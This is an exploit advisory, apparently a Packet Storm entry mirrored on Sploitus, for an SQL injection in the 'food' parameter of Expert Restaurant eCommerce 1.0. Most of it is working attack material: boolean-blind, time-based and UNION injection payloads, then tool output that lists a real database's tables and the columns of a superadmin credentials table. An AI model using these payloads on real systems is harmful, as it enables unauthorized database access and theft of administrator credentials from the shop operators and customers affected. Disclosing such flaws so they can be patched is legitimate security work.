Share
## https://sploitus.com/exploit?id=PACKETSTORM:172796
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ C r a C k E r โโ
โโ T H E C R A C K O F E T E R N A L M I G H T โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโ From The Ashes and Dust Rises An Unimaginable crack.... โโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ [ Vulnerability ] โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: Author : CraCkEr :
โ Website : https://www.codester.com/items/20872/ โ
โ Vendor : Expert IT Solution โ
โ Software : Expert Restaurant eCommerce 1.0 โ
โ Vuln Type: SQL Injection โ
โ Impact : Database Access โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
: :
โ Release Notes: โ
โ โโโโโโโโโโโโโ โ
โ โ
โ SQL injection attacks can allow unauthorized access to sensitive data, modification of โ
โ data and crash the application or make it unavailable, leading to lost revenue and โ
โ damage to a company's reputation. โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโ ยฉ CraCkEr 2023 โโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Path: /food_details.php
https://www.website/food_details.php?food=[SQLI]
GET parameter 'food' is vulnerable to SQL Injection
---
Parameter: food (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[+] Starting the Attack
fetching current database
current database: 'sagor_****_restu'
fetching tables
[34 tables]
+--------------------------+
| add_to_cart_view |
| admin_url |
| contact_manage |
| currencies |
| customer_info |
| delivery_live_status |
| expense_manage |
| food_category |
| food_dish_manage |
| food_dish_vari_man |
| food_field_variant |
| food_field_variant_value |
| food_order_confirm |
| food_review |
| food_sub_category |
| food_tag |
| gallery_manage |
| hall_manage |
| income_manage |
| kitchen_live_sta |
| menu_manage |
| opening_manage |
| order_accounts |
| order_other_address |
| page_manage |
| payment_gateway |
| shipping_charge |
| site_setting |
| slider_manage |
| social_manage |
| sup_ad_log |
| table_book |
| table_manage |
| team_manage |
+--------------------------+
fetching columns for table 'sup_ad_log'
[5 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| status | varchar(100) |
| id | int(11) |
| sup_admin_name | varchar(100) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+----------------+--------------+
[-] Done